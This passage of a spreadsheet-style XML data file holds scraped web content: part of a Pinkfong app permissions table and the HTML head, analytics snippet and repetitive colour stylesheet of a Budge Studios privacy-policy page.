execution\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd style=\"width: 33.3333%;\"\u003eRequired\u003c/td\u003e\u003ctd style=\"width: 33.3333%;\"\u003eCommunication record, WIFI connection information\u003c/td\u003e\u003ctd style=\"width: 33.3333%;\"\u003eOptimization of application use, examination of network connection\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd style=\"width: 33.3333%;\"\u003eOptional\u003c/td\u003e\u003ctd style=\"width: 33.3333%;\"\u003eCamera\u003c/td\u003e\u003ctd style=\"width: 33.3333%;\"\u003eUse of QR code scanning within the application\u003c/td\u003e\u003c/tr\u003e\u003c/tbody\u003e\u003c/table\u003e\u003cp\u003e\u003cbr\u003e\u003c/p\u003e\u003cp\u003e\u003cstrong\u003e[Pinkfong Store Application]\u003c/strong\u003e\u003c/p\u003e\u003ctable style=\"width: 100%;\"\u003e\u003ctbody\u003e\u003ctr\u003e\u003ctd style=\"width: 33.3333%; background-color: rgb(239, 239, 239);\"\u003e\u003cstrong\u003eRequired or Optional\u003cbr\u003e\u003c/strong\u003e\u003c/td\u003e\u003ctd style=\"width: 33.3333%; background-color: rgb(239, 239, 239);\"\u003e\u003cstrong\u003eItem\u003cbr\u003e\u003c/strong\u003e\u003c/td\u003e\u003ctd style=\"width: 33.3333%; background-color: rgb(239, 239, 239);\"\u003e\u003cstrong\u003ePurpose\u003c/strong\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd style=\"width :</t>
  </si>
  <si>
    <t>33.3333%;\"\u003eRequired\u003c/td\u003e\u003ctd style=\"width: 33.3333%;\"\u003eDevice and application record right\u003c/td\u003e\u003ctd style=\"width: 33.3333%;\"\u003eExamination of application status(version)\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd style=\"width: 33.3333%;\"\u003eRequired\u003c/td\u003e\u003ctd style=\"width: 33.3333%;\"\u003eCommunication record, WIFI connection information\u003c/td\u003</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;&lt;html lang="en"&gt;&lt;head&gt;&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8"&gt;&lt;meta charset="utf-8"&gt;&lt;meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=IE9"&gt;&lt;meta name="viewport" content="width=device-width, initial-scale=1, ui-minimal"&gt;&lt;title&gt;Privacy Policy - Budge Studios—Mobile Apps For Kids&lt;/title&gt;&lt;meta name="title" content="Privacy Policy - Budge Studios—Mobile Apps For Kids"&gt;&lt;meta name="description" content="Budge Studios was founded in 2010 with the mission to entertain and educate children around the world, through innovation, creativity, and fun. "&gt;&lt;meta property="og:title" content="Privacy Policy - Budge Studios—Mobile Apps For Kids"&gt;&lt;meta property="og:url" content="https://budgestudios.com/en/legal/privacy-policy/"&gt;&lt;meta property="og:type" content="website"&gt;&lt;meta property="og:image" content="https://budgestudios.com/workspace/uploads/config/budge-partage_site-1477344107.png"&gt;&lt;meta property="og:image:url" content="https://budgestudios.com/workspace/uploads/config/budge-partage_site-1477344107.png"&gt;&lt;meta property="og:image:width" content="1200"&gt;&lt;meta property="og:image:height" content="630"&gt;&lt;meta property="og:description" content="Budge Studios was founded in 2010 with the mission to entertain and educate children around the world, through innovation, creativity, and fun.</t>
  </si>
  <si>
    <t>"&gt;&lt;meta name="twitter: card" content="summary_large_image"&gt;&lt;meta name="twitter:site" content="https://twitter.com/BudgeStudios"&gt;&lt;meta name="twitter:title" content="Privacy Policy - Budge Studios—Mobile Apps For Kids"&gt;&lt;meta name="twitter:creator" content="@BudgeStudios"&gt;&lt;meta name="twitter:domain" content="budgestudios.com"&gt;&lt;meta name="twitter:image" content="https://budgestudios.com/workspace/uploads/config/budge-partage_site-1477344107.png"&gt;&lt;meta name="twitter:description" content="Budge Studios was founded in 2010 with the mission to entertain and educate children around the world, through innovation, creativity, and fun.</t>
  </si>
  <si>
    <t>"&gt;&lt;link rel="dns-prefetch" href="//watermark.deuxhuithuit.com"&gt;&lt;link rel="dns-prefetch" href="//www.google-analytics.com"&gt;&lt;link rel="dns-prefetch" href="//maps.googleapis.com"&gt;&lt;link rel="dns-prefetch" href="//f.vimeocdn.com"&gt;&lt;link rel="dns-prefetch" href="//www.youtube.com"&gt;&lt;link title="Politique de confidentialité" rel="alternate" hreflang="fr" href="/fr/legal/politique-de-confidentialite/"&gt;&lt;link rel="canonical" href="https://budgestudios.com/en/legal/privacy-policy/"&gt;&lt;link rel="shortcut icon" href="https://budgestudios.com/favicon.ico" type="image/vnd.microsoft.icon"&gt;&lt;link rel="icon" href="https://budgestudios.com/favicon.ico" type="image/ico"&gt;&lt;link rel="icon" href="https://budgestudios.com/favicon.png" type="image/png"&gt;&lt;link rel="apple-touch-icon" href="https://budgestudios.com/favicon.png" type="image/png"&gt;&lt;link rel="pavatar" href="https://budgestudios.com/favicon.png" type="image/png"&gt;&lt;meta name="msapplication-TileImage" content="https://budgestudios.com/favicon.png"&gt;&lt;link rel="author" href="https://budgestudios.com/humans.txt"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Lato&amp;amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"&gt;&lt;link rel="stylesheet" type="text/css" href="/workspace/assets/css/bud.min.1.6.2.css" integrity=""&gt;&lt;/head&gt;&lt;body class="en page-legal text-average" data-version="1.6.2"&gt;&lt;script&gt;
var dataLayer = dataLayer || [];
dataLayer.push({'page':{'language':'en'}});
&lt;/script&gt;&lt;noscript&gt;&lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-PL3XPB" height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;&lt;/noscript&gt;&lt;script&gt;(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-PL3XPB');&lt;/script&gt;&lt;div id="site"&gt;&lt;a id="top"&gt;&lt;/a&gt;&lt;style&gt;
			.color-page-id-19-background {
				color: #fdece7;
			}
			.color-page-id-19-foreground {
				color: #e84545;
			}
			.color-page-id-19-highlight {
				color: #da4444;
			}
			.border-color-page-id-19-background {
				border-color: #fdece7;
			}
			.border-color-page-id-19-foreground {
				border-color: #e84545;
			}
			.border-color-page-id-19-highlight {
				border-color: #da4444;
			}
			.bg-color-page-id-19-background {
				background-color: #fdece7;
			}
			.bg-color-page-id-19-foreground {
				background-color: #e84545;
			}
			.bg-color-page-id-19-highlight {
				background-color: #da4444;
			}
			.fill-page-id-19-background {
				fill: #fdece7;
			}
			.fill-page-id-19-foreground {
				fill: #e84545;
			}
			.fill-page-id-19-highlight {
				fill: #da4444;
			}
			.stroke-page-id-19-background {
				stroke: #fdece7;
			}
			.stroke-page-id-19-foreground {
				stroke: #e84545;
			}
			.stroke-page-id-19-highlight {
				stroke: #da4444;
			}
			/*</t>
  </si>
  <si>
    <t>On hover */
			.color-page-id-19-background-on-hover:hover {
				color: #fdece7;
			}
			.color-page-id-19-foreground-on-hover:hover {
				color: #e84545;
			}
			.color-page-id-19-highlight-on-hover:hover {
				color: #da4444;
			}
			.border-color-page-id-19-background-on-hover:hover {
				border-color: #fdece7;
			}
			.border-color-page-id-19-foreground-on-hover:hover {
				border-color: #e84545;
			}
			.border-color-page-id-19-highlight-on-hover:hover {
				border-color: #da4444;
			}
			.bg-color-page-id-19-background-on-hover:hover {
				background-color: #fdece7;
			}
			.bg-color-page-id-19-foreground-on-hover:hover {
				background-color: #e84545;
			}
			.bg-color-page-id-19-highlight-on-hover:hover {
				background-color: #da4444;
			}
			.fill-page-id-19-background-on-hover:hover {
				fill: #fdece7;
			}
			.fill-page-id-19-foreground-on-hover:hover {
				fill: #e84545;
			}
			.fill-page-id-19-highlight-on-hover:hover {
				fill: #da4444;
			}
			.stroke-page-id-19-background-on-hover:hover {
				stroke: #fdece7;
			}
			.stroke-page-id-19-foreground-on-hover:hover {
				stroke: #e84545;
			}
			.stroke-page-id-19-highlight-on-hover:hover {
				stroke: #da4444;
			}
			/* When is active */
			.color-page-id-19-background-when-is-active.is-active {
				color: #fdece7;
			}
			.color-page-id-19-foreground-when-is-active.is-active {
				color: #e84545;
			}
			.color-page-id-19-highlight-when-is-active.is-active {
				color: #da4444;
			}
			.border-color-page-id-19-background-when-is-active.is-active {
				border-color: #fdece7;
			}
			.border-color-page-id-19-foreground-when-is-active.is-active {
				border-color: #e84545;
			}
			.border-color-page-id-19-highlight-when-is-active.is-active {
				border-color: #da4444;
			}
			.bg-color-page-id-19-background-when-is-active.is-active {
				background-color: #fdece7;
			}
			.bg-color-page-id-19-foreground-when-is-active.is-active {
				background-color: #e84545;
			}
			.bg-color-page-id-19-highlight-when-is-active.is-active {
				background-color: #da4444;
			}
			.fill-page-id-19-background-when-is-active.is-active {
				fill: #fdece7;
			}
			.fill-page-id-19-foreground-when-is-active.is-active {
				fill: #e84545;
			}
			.fill-page-id-19-highlight-when-is-active.is-active {
				fill: #da4444;
			}
			.stroke-page-id-19-background-when-is-active.is-active {
				stroke: #fdece7;
			}
			.stroke-page-id-19-foreground-when-is-active.is-active {
				stroke: #e84545;
			}
			.stroke-page-id-19-highlight-when-is-active.is-active {
				stroke: #da4444;
			}
			.color-page-id-9-background {
				color: #ffffff;
			}
			.color-page-id-9-foreground {
				color: #828282;
			}
			.color-page-id-9-highlight {
				color: #67248e;
			}
			.border-color-page-id-9-background {
				border-color: #ffffff;
			}
			.border-color-page-id-9-foreground {
				border-color: #828282;
			}
			.border-color-page-id-9-highlight {
				border-color: #67248e;
			}
			.bg-color-page-id-9-background {
				background-color: #ffffff;
			}
			.bg-color-page-id-9-foreground {
				background-color: #828282;
			}
			.bg-color-page-id-9-highlight {
				background-color: #67248e;
			}
			.fill-page-id-9-background {
				fill: #ffffff;
			}
			.fill-page-id-9-foreground {
				fill: #828282;
			}
			.fill-page-id-9-highlight {
				fill: #67248e;
			}
			.stroke-page-id-9-background {
				stroke: #ffffff;
			}
			.stroke-page-id-9-foreground {
				stroke: #828282;
			}
			.stroke-page-id-9-highlight {
				stroke: #67248e;
			}
			/* On hover */
			.color-page-id-9-background-on-hover:hover {
				color: #ffffff;
			}
			.color-page-id-9-foreground-on-hover:hover {
				color: #828282;
			}
			.color-page-id-9-highlight-on-hover:hover {
				color: #67248e;
			}
			.border-color-page-id-9-background-on-hover:hover {
				border-color: #ffffff;
			}
			.border-color-page-id-9-foreground-on-hover:hover {
				border-color: #828282;
			}
			.border-color-page-id-9-highlight-on-hover:hover {
				border-color: #67248e;
			}
			.bg-color-page-id-9-background-on-hover:hover {
				background-color: #ffffff;
			}
			.bg-color-page-id-9-foreground-on-hover:hover {
				background-color: #828282;
			}
			.bg-color-page-id-9-highlight-on-hover:hover {
				background-color: #67248e;
			}
			.fill-page-id-9-background-on-hover:hover {
				fill: #ffffff;
			}
			.fill-page-id-9-foreground-on-hover:hover {
				fill: #828282;
			}
			.fill-page-id-9-highlight-on-hover:hover {
				fill: #67248e;
			}
			.stroke-page-id-9-background-on-hover:hover {
				stroke: #ffffff;
			}
			.stroke-page-id-9-foreground-on-hover:hover {
				stroke: #828282;
			}
			.stroke-page-id-9-highlight-on-hover:hover {
				stroke: #67248e;
			}
			/*</t>
  </si>
  <si>
    <t>When is active */
			.color-page-id-9-background-when-is-active.is-active {
				color: #ffffff;
			}
			.color-page-id-9-foreground-when-is-active.is-active {
				color: #828282;
			}
			.color-page-id-9-highlight-when-is-active.is-active {
				color: #67248e;
			}
			.border-color-page-id-9-background-when-is-active.is-active {
				border-color: #ffffff;
			}
			.border-color-page-id-9-foreground-when-is-active.is-active {
				border-color: #828282;
			}
			.border-color-page-id-9-highlight-when-is-active.is-active {
				border-color: #67248e;
			}
			.bg-color-page-id-9-background-when-is-active.is-active {
				background-color: #ffffff;
			}
			.bg-color-page-id-9-foreground-when-is-active.is-active {
				background-color: #828282;
			}
			.bg-color-page-id-9-highlight-when-is-active.is-active {
				background-color: #67248e;
			}
			.fill-page-id-9-background-when-is-active.is-active {
				fill: #ffffff;
			}
			.fill-page-id-9-foreground-when-is-active.is-active {
				fill: #828282;
			}
			.fill-page-id-9-highlight-when-is-active.is-active {
				fill: #67248e;
			}
			.stroke-page-id-9-background-when-is-active.is-active {
				stroke: #ffffff;
			}
			.stroke-page-id-9-foreground-when-is-active.is-active {
				stroke: #828282;
			}
			.stroke-page-id-9-highlight-when-is-active.is-active {
				stroke: #67248e;
			}
			.color-page-id-14-background {
				color: ;
			}
			.color-page-id-14-foreground {
				color: #828282;
			}
			.color-page-id-14-highlight {
				color: #30af6b;
			}
			.border-color-page-id-14-background {
				border-color: ;
			}
			.border-color-page-id-14-foreground {
				border-color: #828282;
			}
			.border-color-page-id-14-highlight {
				border-color: #30af6b;
			}
			.bg-color-page-id-14-background {
				background-color: ;
			}
			.bg-color-page-id-14-foreground {
				background-color: #828282;
			}
			.bg-color-page-id-14-highlight {
				background-color: #30af6b;
			}
			.fill-page-id-14-background {
				fill: ;
			}
			.fill-page-id-14-foreground {
				fill: #828282;
			}
			.fill-page-id-14-highlight {
				fill: #30af6b;
			}
			.stroke-page-id-14-background {
				stroke: ;
			}
			.stroke-page-id-14-foreground {
				stroke: #828282;
			}
			.stroke-page-id-14-highlight {
				stroke: #30af6b;
			}
			/* On hover */
			.color-page-id-14-background-on-hover:hover {
				color: ;
			}
			.color-page-id-14-foreground-on-hover:hover {
				color: #828282;
			}
			.color-page-id-14-highlight-on-hover:hover {
				color: #30af6b;
			}
			.border-color-page-id-14-background-on-hover:hover {
				border-color: ;
			}
			.border-color-page-id-14-foreground-on-hover:hover {
				border-color: #828282;
			}
			.border-color-page-id-14-highlight-on-hover:hover {
				border-color: #30af6b;
			}
			.bg-color-page-id-14-background-on-hover:hover {
				background-color: ;
			}
			.bg-color-page-id-14-foreground-on-hover:hover {
				background-color: #828282;
			}
			.bg-color-page-id-14-highlight-on-hover:hover {
				background-color: #30af6b;
			}
			.fill-page-id-14-background-on-hover:hover {
				fill: ;
			}
			.fill-page-id-14-foreground-on-hover:hover {
				fill: #828282;
			}
			.fill-page-id-14-highlight-on-hover:hover {
				fill: #30af6b;
			}
			.stroke-page-id-14-background-on-hover:hover {
				stroke: ;
			}
			.stroke-page-id-14-foreground-on-hover:hover {
				stroke: #828282;
			}
			.stroke-page-id-14-highlight-on-hover:hover {
				stroke: #30af6b;
			}
			/* When is active */
			.color-page-id-14-background-when-is-active.is-active {
				color: ;
			}
			.color-page-id-14-foreground-when-is-active.is-active {
				color: #828282;
			}
			.color-page-id-14-highlight-when-is-active.is-active {
				color: #30af6b;
			}
			.border-color-page-id-14-background-when-is-active.is-active {
				border-color: ;
			}
			.border-color-page-id-14-foreground-when-is-active.is-active {
				border-color: #828282;
			}
			.border-color-page-id-14-highlight-when-is-active.is-active {
				border-color: #30af6b;
			}
			.bg-color-page-id-14-background-when-is-active.is-active {
				background-color: ;
			}
			.bg-color-page-id-14-foreground-when-is-active.is-active {
				background-color: #828282;
			}
			.bg-color-page-id-14-highlight-when-is-active.is-active {
				background-color: #30af6b;
			}
			.fill-page-id-14-background-when-is-active.is-active {
				fill: ;
			}
			.fill-page-id-14-foreground-when-is-active.is-active {
				fill: #828282;
			}
			.fill-page-id-14-highlight-when-is-active.is-active {
				fill: #30af6b;
			}
			.stroke-page-id-14-background-when-is-active.is-active {
				stroke: ;
			}
			.stroke-page-id-14-foreground-when-is-active.is-active {
				stroke: #828282;
			}
			.stroke-page-id-14-highlight-when-is-active.is-active {
				stroke: #30af6b;
			}
			.color-page-id-11-background {
				color: #ffffff;
			}
			.color-page-id-11-foreground {
				color: #828282;
			}
			.color-page-id-11-highlight {
				color: #349bd8;
			}
			.border-color-page-id-11-background {
				border-color: #ffffff;
			}
			.border-color-page-id-11-foreground {
				border-color: #828282;
			}
			.border-color-page-id-11-highlight {
				border-color: #349bd8;
			}
			.bg-color-page-id-11-background {
				background-color: #ffffff;
			}
			.bg-color-page-id-11-foreground {
				background-color: #828282;
			}
			.bg-color-page-id-11-highlight {
				background-color: #349bd8;
			}
			.fill-page-id-11-background {
				fill: #ffffff;
			}
			.fill-page-id-11-foreground {
				fill: #828282;
			}
			.fill-page-id-11-highlight {
				fill: #349bd8;
			}
			.stroke-page-id-11-background {
				stroke: #ffffff;
			}
			.stroke-page-id-11-foreground {
				stroke: #828282;
			}
			.stroke-page-id-11-highlight {
				stroke: #349bd8;
			}
			/*</t>
  </si>
  <si>
    <t>On hover */
			.color-page-id-11-background-on-hover:hover {
				color: #ffffff;
			}
			.color-page-id-11-foreground-on-hover:hover {
				color: #828282;
			}
			.color-page-id-11-highlight-on-hover:hover {
				color: #349bd8;
			}
			.border-color-page-id-11-background-on-hover:hover {
				border-color: #ffffff;
			}
			.border-color-page-id-11-foreground-on-hover:hover {
				border-color: #828282;
			}
			.border-color-page-id-11-highlight-on-hover:hover {
				border-color: #349bd8;
			}
			.bg-color-page-id-11-background-on-hover:hover {
				background-color: #ffffff;
			}
			.bg-color-page-id-11-foreground-on-hover:hover {
				background-color: #828282;
			}
			.bg-color-page-id-11-highlight-on-hover:hover {
				background-color: #349bd8;
			}
			.fill-page-id-11-background-on-hover:hover {
				fill: #ffffff;
			}
			.fill-page-id-11-foreground-on-hover:hover {
				fill: #828282;
			}
			.fill-page-id-11-highlight-on-hover:hover {
				fill: #349bd8;
			}
			.stroke-page-id-11-background-on-hover:hover {
				stroke: #ffffff;
			}
			.stroke-page-id-11-foreground-on-hover:hover {
				stroke: #828282;
			}
			.stroke-page-id-11-highlight-on-hover:hover {
				stroke: #349bd8;
			}
			/* When is active */
			.color-page-id-11-background-when-is-active.is-active {
				color: #ffffff;
			}
			.color-page-id-11-foreground-when-is-active.is-active {
				color: #828282;
			}
			.color-page-id-11-highlight-when-is-active.is-active {
				color: #349bd8;
			}
			.border-color-page-id-11-background-when-is-active.is-active {
				border-color: #ffffff;
			}
			.border-color-page-id-11-foreground-when-is-active.is-active {
				border-color: #828282;
			}
			.border-color-page-id-11-highlight-when-is-active.is-active {
				border-color: #349bd8;
			}
			.bg-color-page-id-11-background-when-is-active.is-active {
				background-color: #ffffff;
			}
			.bg-color-page-id-11-foreground-when-is-active.is-active {
				background-color: #828282;
			}
			.bg-color-page-id-11-highlight-when-is-active.is-active {
				background-color: #349bd8;
			}
			.fill-page-id-11-background-when-is-active.is-active {
				fill: #ffffff;
			}
			.fill-page-id-11-foreground-when-is-active.is-active {
				fill: #828282;
			}
			.fill-page-id-11-highlight-when-is-active.is-active {
				fill: #349bd8;
			}
			.stroke-page-id-11-background-when-is-active.is-active {
				stroke: #ffffff;
			}
			.stroke-page-id-11-foreground-when-is-active.is-active {
				stroke: #828282;
			}
			.stroke-page-id-11-highlight-when-is-active.is-active {
				stroke: #349bd8;
			}
			.color-page-id-17-background {
				color: #ffffff;
			}
			.color-page-id-17-foreground {
				color: #828282;
			}
			.color-page-id-17-highlight {
				color: #f15f2f;
			}
			.border-color-page-id-17-background {
				border-color: #ffffff;
			}
			.border-color-page-id-17-foreground {
				border-color: #828282;
			}
			.border-color-page-id-17-highlight {
				border-color: #f15f2f;
			}
			.bg-color-page-id-17-background {
				background-color: #ffffff;
			}
			.bg-color-page-id-17-foreground {
				background-color: #828282;
			}
			.bg-color-page-id-17-highlight {
				background-color: #f15f2f;
			}
			.fill-page-id-17-background {
				fill: #ffffff;
			}
			.fill-page-id-17-foreground {
				fill: #828282;
			}
			.fill-page-id-17-highlight {
				fill: #f15f2f;
			}
			.stroke-page-id-17-background {
				stroke: #ffffff;
			}
			.stroke-page-id-17-foreground {
				stroke: #828282;
			}
			.stroke-page-id-17-highlight {
				stroke: #f15f2f;
			}
			/* On hover */
			.color-page-id-17-background-on-hover:hover {
				color: #ffffff;
			}
			.color-page-id-17-foreground-on-hover:hover {
				color: #828282;
			}
			.color-page-id-17-highlight-on-hover:hover {
				color: #f15f2f;
			}
			.border-color-page-id-17-background-on-hover:hover {
				border-color: #ffffff;
			}
			.border-color-page-id-17-foreground-on-hover:hover {
				border-color: #828282;
			}
			.border-color-page-id-17-highlight-on-hover:hover {
				border-color: #f15f2f;
			}
			.bg-color-page-id-17-background-on-hover:hover {
				background-color: #ffffff;
			}
			.bg-color-page-id-17-foreground-on-hover:hover {
				background-color: #828282;
			}
			.bg-color-page-id-17-highlight-on-hover:hover {
				background-color: #f15f2f;
			}
			.fill-page-id-17-background-on-hover:hover {
				fill: #ffffff;
			}
			.fill-page-id-17-foreground-on-hover:hover {
				fill: #828282;
			}
			.fill-page-id-17-highlight-on-hover:hover {
				fill: #f15f2f;
			}
			.stroke-page-id-17-background-on-hover:hover {
				stroke: #ffffff;
			}
			.stroke-page-id-17-foreground-on-hover:hover {
				stroke: #828282;
			}
			.stroke-page-id-17-highlight-on-hover:hover {
				stroke: #f15f2f;
			}
			/*</t>
  </si>
  <si>
    <t>When is active */
			.color-page-id-17-background-when-is-active.is-active {
				color: #ffffff;
			}
			.color-page-id-17-foreground-when-is-active.is-active {
				color: #828282;
			}
			.color-page-id-17-highlight-when-is-active.is-active {
				color: #f15f2f;
			}
			.border-color-page-id-17-background-when-is-active.is-active {
				border-color: #ffffff;
			}
			.border-color-page-id-17-foreground-when-is-active.is-active {
				border-color: #828282;
			}
			.border-color-page-id-17-highlight-when-is-active.is-active {
				border-color: #f15f2f;
			}
			.bg-color-page-id-17-background-when-is-active.is-active {
				background-color: #ffffff;
			}
			.bg-color-page-id-17-foreground-when-is-active.is-active {
				background-color: #828282;
			}
			.bg-color-page-id-17-highlight-when-is-active.is-active {
				background-color: #f15f2f;
			}
			.fill-page-id-17-background-when-is-active.is-active {
				fill: #ffffff;
			}
			.fill-page-id-17-foreground-when-is-active.is-active {
				fill: #828282;
			}
			.fill-page-id-17-highlight-when-is-active.is-active {
				fill: #f15f2f;
			}
			.stroke-page-id-17-background-when-is-active.is-active {
				stroke: #ffffff;
			}
			.stroke-page-id-17-foreground-when-is-active.is-active {
				stroke: #828282;
			}
			.stroke-page-id-17-highlight-when-is-active.is-active {
				stroke: #f15f2f;
			}
			.color-page-id-8-background {
				color: #ffffff;
			}
			.color-page-id-8-foreground {
				color: #828282;
			}
			.color-page-id-8-highlight {
				color: #349bd8;
			}
			.border-color-page-id-8-background {
				border-color: #ffffff;
			}
			.border-color-page-id-8-foreground {
				border-color: #828282;
			}
			.border-color-page-id-8-highlight {
				border-color: #349bd8;
			}
			.bg-color-page-id-8-background {
				background-color: #ffffff;
			}
			.bg-color-page-id-8-foreground {
				background-color: #828282;
			}
			.bg-color-page-id-8-highlight {
				background-color: #349bd8;
			}
			.fill-page-id-8-background {
				fill: #ffffff;
			}
			.fill-page-id-8-foreground {
				fill: #828282;
			}
			.fill-page-id-8-highlight {
				fill: #349bd8;
			}
			.stroke-page-id-8-background {
				stroke: #ffffff;
			}
			.stroke-page-id-8-foreground {
				stroke: #828282;
			}
			.stroke-page-id-8-highlight {
				stroke: #349bd8;
			}
			/* On hover */
			.color-page-id-8-background-on-hover:hover {
				color: #ffffff;
			}
			.color-page-id-8-foreground-on-hover:hover {
				color: #828282;
			}
			.color-page-id-8-highlight-on-hover:hover {
				color: #349bd8;
			}
			.border-color-page-id-8-background-on-hover:hover {
				border-color: #ffffff;
			}
			.border-color-page-id-8-foreground-on-hover:hover {
				border-color: #828282;
			}
			.border-color-page-id-8-highlight-on-hover:hover {
				border-color: #349bd8;
			}
			.bg-color-page-id-8-background-on-hover:hover {
				background-color: #ffffff;
			}
			.bg-color-page-id-8-foreground-on-hover:hover {
				background-color: #828282;
			}
			.bg-color-page-id-8-highlight-on-hover:hover {
				background-color: #349bd8;
			}
			.fill-page-id-8-background-on-hover:hover {
				fill: #ffffff;
			}
			.fill-page-id-8-foreground-on-hover:hover {
				fill: #828282;
			}
			.fill-page-id-8-highlight-on-hover:hover {
				fill: #349bd8;
			}
			.stroke-page-id-8-background-on-hover:hover {
				stroke: #ffffff;
			}
			.stroke-page-id-8-foreground-on-hover:hover {
				stroke: #828282;
			}
			.stroke-page-id-8-highlight-on-hover:hover {
				stroke: #349bd8;
			}
			/* When is active */
			.color-page-id-8-background-when-is-active.is-active {
				color: #ffffff;
			}
			.color-page-id-8-foreground-when-is-active.is-active {
				color: #828282;
			}
			.color-page-id-8-highlight-when-is-active.is-active {
				color: #349bd8;
			}
			.border-color-page-id-8-background-when-is-active.is-active {
				border-color: #ffffff;
			}
			.border-color-page-id-8-foreground-when-is-active.is-active {
				border-color: #828282;
			}
			.border-color-page-id-8-highlight-when-is-active.is-active {
				border-color: #349bd8;
			}
			.bg-color-page-id-8-background-when-is-active.is-active {
				background-color: #ffffff;
			}
			.bg-color-page-id-8-foreground-when-is-active.is-active {
				background-color: #828282;
			}
			.bg-color-page-id-8-highlight-when-is-active.is-active {
				background-color: #349bd8;
			}
			.fill-page-id-8-background-when-is-active.is-active {
				fill: #ffffff;
			}
			.fill-page-id-8-foreground-when-is-active.is-active {
				fill: #828282;
			}
			.fill-page-id-8-highlight-when-is-active.is-active {
				fill: #349bd8;
			}
			.stroke-page-id-8-background-when-is-active.is-active {
				stroke: #ffffff;
			}
			.stroke-page-id-8-foreground-when-is-active.is-active {
				stroke: #828282;
			}
			.stroke-page-id-8-highlight-when-is-active.is-active {
				stroke: #349bd8;
			}
			.color-page-id-16-background {
				color: ;
			}
			.color-page-id-16-foreground {
				color: #828282;
			}
			.color-page-id-16-highlight {
				color: #30af6b;
			}
			.border-color-page-id-16-background {
				border-color: ;
			}
			.border-color-page-id-16-foreground {
				border-color: #828282;
			}
			.border-color-page-id-16-highlight {
				border-color: #30af6b;
			}
			.bg-color-page-id-16-background {
				background-color: ;
			}
			.bg-color-page-id-16-foreground {
				background-color: #828282;
			}
			.bg-color-page-id-16-highlight {
				background-color: #30af6b;
			}
			.fill-page-id-16-background {
				fill: ;
			}
			.fill-page-id-16-foreground {
				fill: #828282;
			}
			.fill-page-id-16-highlight {
				fill: #30af6b;
			}
			.stroke-page-id-16-background {
				stroke: ;
			}
			.stroke-page-id-16-foreground {
				stroke: #828282;
			}
			.stroke-page-id-16-highlight {
				stroke: #30af6b;
			}
			/*</t>
  </si>
  <si>
    <t>On hover */
			.color-page-id-16-background-on-hover:hover {
				color: ;
			}
			.color-page-id-16-foreground-on-hover:hover {
				color: #828282;
			}
			.color-page-id-16-highlight-on-hover:hover {
				color: #30af6b;
			}
			.border-color-page-id-16-background-on-hover:hover {
				border-color: ;
			}
			.border-color-page-id-16-foreground-on-hover:hover {
				border-color: #828282;
			}
			.border-color-page-id-16-highlight-on-hover:hover {
				border-color: #30af6b;
			}
			.bg-color-page-id-16-background-on-hover:hover {
				background-color: ;
			}
			.bg-color-page-id-16-foreground-on-hover:hover {
				background-color: #828282;
			}
			.bg-color-page-id-16-highlight-on-hover:hover {
				background-color: #30af6b;
			}
			.fill-page-id-16-background-on-hover:hover {
				fill: ;
			}
			.fill-page-id-16-foreground-on-hover:hover {
				fill: #828282;
			}
			.fill-page-id-16-highlight-on-hover:hover {
				fill: #30af6b;
			}
			.stroke-page-id-16-background-on-hover:hover {
				stroke: ;
			}
			.stroke-page-id-16-foreground-on-hover:hover {
				stroke: #828282;
			}
			.stroke-page-id-16-highlight-on-hover:hover {
				stroke: #30af6b;
			}
			/* When is active */
			.color-page-id-16-background-when-is-active.is-active {
				color: ;
			}
			.color-page-id-16-foreground-when-is-active.is-active {
				color: #828282;
			}
			.color-page-id-16-highlight-when-is-active.is-active {
				color: #30af6b;
			}
			.border-color-page-id-16-background-when-is-active.is-active {
				border-color: ;
			}
			.border-color-page-id-16-foreground-when-is-active.is-active {
				border-color: #828282;
			}
			.border-color-page-id-16-highlight-when-is-active.is-active {
				border-color: #30af6b;
			}
			.bg-color-page-id-16-background-when-is-active.is-active {
				background-color: ;
			}
			.bg-color-page-id-16-foreground-when-is-active.is-active {
				background-color: #828282;
			}
			.bg-color-page-id-16-highlight-when-is-active.is-active {
				background-color: #30af6b;
			}
			.fill-page-id-16-background-when-is-active.is-active {
				fill: ;
			}
			.fill-page-id-16-foreground-when-is-active.is-active {
				fill: #828282;
			}
			.fill-page-id-16-highlight-when-is-active.is-active {
				fill: #30af6b;
			}
			.stroke-page-id-16-background-when-is-active.is-active {
				stroke: ;
			}
			.stroke-page-id-16-foreground-when-is-active.is-active {
				stroke: #828282;
			}
			.stroke-page-id-16-highlight-when-is-active.is-active {
				stroke: #30af6b;
			}
			.color-page-id-15-background {
				color: #ffffff;
			}
			.color-page-id-15-foreground {
				color: #a66cf1;
			}
			.color-page-id-15-highlight {
				color: #8749ab;
			}
			.border-color-page-id-15-background {
				border-color: #ffffff;
			}
			.border-color-page-id-15-foreground {
				border-color: #a66cf1;
			}
			.border-color-page-id-15-highlight {
				border-color: #8749ab;
			}
			.bg-color-page-id-15-background {
				background-color: #ffffff;
			}
			.bg-color-page-id-15-foreground {
				background-color: #a66cf1;
			}
			.bg-color-page-id-15-highlight {
				background-color: #8749ab;
			}
			.fill-page-id-15-background {
				fill: #ffffff;
			}
			.fill-page-id-15-foreground {
				fill: #a66cf1;
			}
			.fill-page-id-15-highlight {
				fill: #8749ab;
			}
			.stroke-page-id-15-background {
				stroke: #ffffff;
			}
			.stroke-page-id-15-foreground {
				stroke: #a66cf1;
			}
			.stroke-page-id-15-highlight {
				stroke: #8749ab;
			}
			/ *</t>
  </si>
  <si>
    <t xml:space="preserve">On hover */
			.color-page-id-15-background-on-hover:hover {
				color: #ffffff;
			}
			.color-page-id-15-foreground-on-hover:hover {
				color: #a66cf1;
			}
